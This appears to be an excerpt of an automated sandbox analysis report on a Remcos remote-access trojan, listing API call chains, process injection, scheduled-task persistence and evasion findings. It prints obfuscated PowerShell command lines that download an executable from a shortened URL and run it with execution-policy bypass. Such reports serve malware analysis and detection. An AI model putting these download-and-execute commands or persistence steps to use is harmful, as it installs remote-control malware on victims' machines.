                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: 34_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$ch
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: powershell.exe, 0000000A.00000002.2175630207.00000000001AE000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00409908 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\sm.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Bypasses PowerShell execution policyShow sources
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Contains functionality to inject code into remote processesShow sources
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\user\AppData\Local\Temp\sm.exeMemory written: C:\Users\user\AppData\Local\Temp\sm.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMemory written: C:\Users\user\AppData\Roaming\Remcos\remcos.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMemory written: C:\Users\user\AppData\Roaming\Remcos\remcos.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: GetCurrentProcessId,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenMutexA,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,OpenProcess,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,_wgetenv,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,CloseHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, \svchost.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_00410145 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,StrToIntA,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,mouse_event,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/mjfU5y0','sm.exe')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item 'sm.exe' -Destination '${enV`:temp}'
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/sm.exe')
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp'
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess created: C:\Users\user\AppData\Local\Temp\sm.exe C:\Users\user\AppData\Local\Temp\sm.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe'
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp915.tmp'
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp362D.tmp'
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_004124A0 cpuid
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
